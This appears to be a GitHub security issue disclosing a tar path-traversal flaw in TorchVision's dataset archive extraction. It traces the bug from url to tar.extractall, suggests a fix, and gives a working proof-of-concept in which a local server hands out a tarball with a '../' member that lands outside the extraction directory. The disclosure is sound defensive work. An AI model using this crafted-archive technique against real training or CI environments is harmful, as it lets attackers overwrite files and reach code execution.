Skip to content

Path traversal in TorchVision dataset archive extraction #9517

Description

@quart27219

🐛 Describe the bug

RCA

def download_and_extract_archive(
    url: str,
    download_root: Union[str, pathlib.Path],
    extract_root: Optional[Union[str, pathlib.Path]] = None,
    filename: Optional[Union[str, pathlib.Path]] = None,
    md5: Optional[str] = None,
    remove_finished: bool = False,
) -> None:
    # Excerpt only: the statements replaced by `...` are not shown here.
    ...
    # Taint source: `url` is supplied by the caller and is handed to
    # download_url together with the download directory, file name and md5.
    download_url(url, download_root, filename, md5)

The source is the caller-provided url. The helper downloads the remote archive into the local dataset cache.

# Build the path of the downloaded file and pass it straight to
# extract_archive; nothing between these two lines inspects the archive.
archive = os.path.join(download_root, filename)
extract_archive(archive, extract_root, remove_finished)

The downloaded archive is propagated directly into the extraction helper.

def _extract_tar(from_path, to_path, compression):
    """Extract the tar archive at ``from_path`` into ``to_path``.

    ``compression`` selects the tarfile read mode: when truthy, its first
    character is dropped and the rest is appended to ``"r:"``; otherwise the
    archive is opened with plain ``"r"``.
    """
    # presumably `compression` is a suffix such as ".gz" - TODO confirm against caller
    with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
        # NOTE(review): extractall is called with no `filter=` argument and no
        # per-member check here, so member names are used as stored in the archive.
        tar.extractall(to_path)

The sink is tar.extractall(to_path). Nothing verifies that each member's resolved path stays under to_path, and symlink and hardlink members are not rejected before extraction.

PoC

import importlib.util
import io
import pathlib
import sys
import tarfile
import tempfile
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer


def load_torchvision_dataset_utils(repo_root: pathlib.Path):
    """Load ``torchvision/datasets/utils.py`` from a source tree without real torch.

    Stand-in modules for ``torch``, ``torch.utils``, ``torch.utils.model_zoo``,
    ``torchvision``, ``torchvision.datasets`` and
    ``torchvision._internally_replaced_utils`` are written into
    ``sys.modules`` (overwriting any existing entries). The utils file under
    *repo_root* is then executed under the name ``torchvision.datasets.utils``.

    Args:
        repo_root: Root directory of the TorchVision checkout.

    Returns:
        The freshly executed ``torchvision.datasets.utils`` module object.
    """

    class DummyTqdm:
        """Silent progress-bar stand-in: accepts anything, does nothing."""

        def __init__(self, *args, **kwargs):
            pass

        def __enter__(self):
            return self

        def __exit__(self, *args):
            return False

        def update(self, *args, **kwargs):
            pass

    def _download_stub(*args, **kwargs):
        return None

    def _remote_unavailable():
        return False

    stub_names = (
        "torch",
        "torch.utils",
        "torch.utils.model_zoo",
        "torchvision",
        "torchvision.datasets",
        "torchvision._internally_replaced_utils",
    )
    stubs = {name: types.ModuleType(name) for name in stub_names}

    # Wire up the fake torch hierarchy: torch.utils.model_zoo.tqdm and torch.Tensor.
    fake_torch = stubs["torch"]
    fake_torch_utils = stubs["torch.utils"]
    fake_model_zoo = stubs["torch.utils.model_zoo"]
    fake_torch.Tensor = object
    fake_model_zoo.tqdm = DummyTqdm
    fake_torch_utils.model_zoo = fake_model_zoo
    fake_torch.utils = fake_torch_utils

    # An (empty) __path__ marks the torchvision stubs as packages.
    for package_name in ("torchvision", "torchvision.datasets"):
        stubs[package_name].__path__ = []

    fake_internal = stubs["torchvision._internally_replaced_utils"]
    fake_internal._download_file_from_remote_location = _download_stub
    fake_internal._is_remote_location_available = _remote_unavailable

    sys.modules.update(stubs)

    source_file = repo_root.joinpath("torchvision", "datasets", "utils.py")
    module_spec = importlib.util.spec_from_file_location(
        "torchvision.datasets.utils", source_file
    )
    loaded = importlib.util.module_from_spec(module_spec)
    # Register before executing so the module can be found by name while it runs.
    sys.modules[module_spec.name] = loaded
    module_spec.loader.exec_module(loaded)
    return loaded


class MaliciousTarHandler(BaseHTTPRequestHandler):
    """HTTP handler that answers every GET with a gzip tarball holding a ``../`` member."""

    def log_message(self, *args):
        """Discard request log output."""

    def do_HEAD(self):
        """Reply 200 with a Content-Length of ``1`` and no body."""
        self.send_response(200)
        self.send_header("Content-Length", "1")
        self.end_headers()

    def do_GET(self):
        """Build the archive in memory and send it as ``application/gzip``."""
        # One benign member, then one whose name climbs out of the extraction root.
        members = (
            ("inside.txt", b"ok\n"),
            ("../torchvision_variant_marker", b"TORCHVISION_PATH_TRAVERSAL_CONFIRMED\n"),
        )

        buffer = io.BytesIO()
        with tarfile.open(fileobj=buffer, mode="w:gz") as archive:
            for member_name, payload in members:
                entry = tarfile.TarInfo(member_name)
                entry.size = len(payload)
                archive.addfile(entry, io.BytesIO(payload))
        archive_bytes = buffer.getvalue()

        self.send_response(200)
        response_headers = (
            ("Content-Type", "application/gzip"),
            ("Content-Length", str(len(archive_bytes))),
        )
        for header_name, header_value in response_headers:
            self.send_header(header_name, header_value)
        self.end_headers()
        self.wfile.write(archive_bytes)


def main():
    """Run the proof of concept against a TorchVision checkout.

    The checkout root is taken from ``sys.argv[1]`` (default: the current
    directory). A local HTTP server hands out the crafted archive,
    ``download_and_extract_archive`` is pointed at it, and the script then
    prints whether the benign member landed inside the extraction directory
    and whether the ``../`` member landed next to it, outside that directory.
    """
    repo_root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".").resolve()
    dataset_utils = load_torchvision_dataset_utils(repo_root)

    with tempfile.TemporaryDirectory() as temp_dir:
        # Port 0 lets the OS choose a free port; it is read back from server_port.
        server = HTTPServer(("127.0.0.1", 0), MaliciousTarHandler)
        thread = threading.Thread(target=server.serve_forever, daemon=True)
        thread.start()
        try:
            download_root = pathlib.Path(temp_dir) / "download"
            extract_root = pathlib.Path(temp_dir) / "extract"
            url = f"http://127.0.0.1:{server.server_port}/dataset.tar.gz"
            dataset_utils.download_and_extract_archive(
                url,
                str(download_root),
                str(extract_root),
                filename="dataset.tar.gz",
            )
        finally:
            server.shutdown()
            thread.join(timeout=2)
            # shutdown() only stops the serve_forever loop; server_close()
            # is what actually releases the listening socket.
            server.server_close()

        # "../torchvision_variant_marker" relative to extract_root resolves to
        # the temporary directory itself, one level above the extraction root.
        marker = pathlib.Path(temp_dir) / "torchvision_variant_marker"
        print(f"inside_exists={(extract_root / 'inside.txt').exists()}")
        print(f"traversal_marker_exists={marker.exists()}")
        if marker.exists():
            print(marker.read_text().strip())


if __name__ == "__main__":
    main()

Impact

An attacker who controls a dataset archive URL, or who can tamper with an archive anywhere along the path by which it is supplied to the TorchVision dataset utilities, can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files, and may lead to code execution during a later import, training, or evaluation step.

Suggested Fix

Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths, .. traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.

On Python versions that support extraction filters (3.12 and later, plus the security releases of older branches that backported the feature), pass a filter such as filter="data" to extractall in addition to explicit destination containment checks. Zip extraction should apply the same containment validation to member names.

Versions

TorchVision 0.27 Release

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions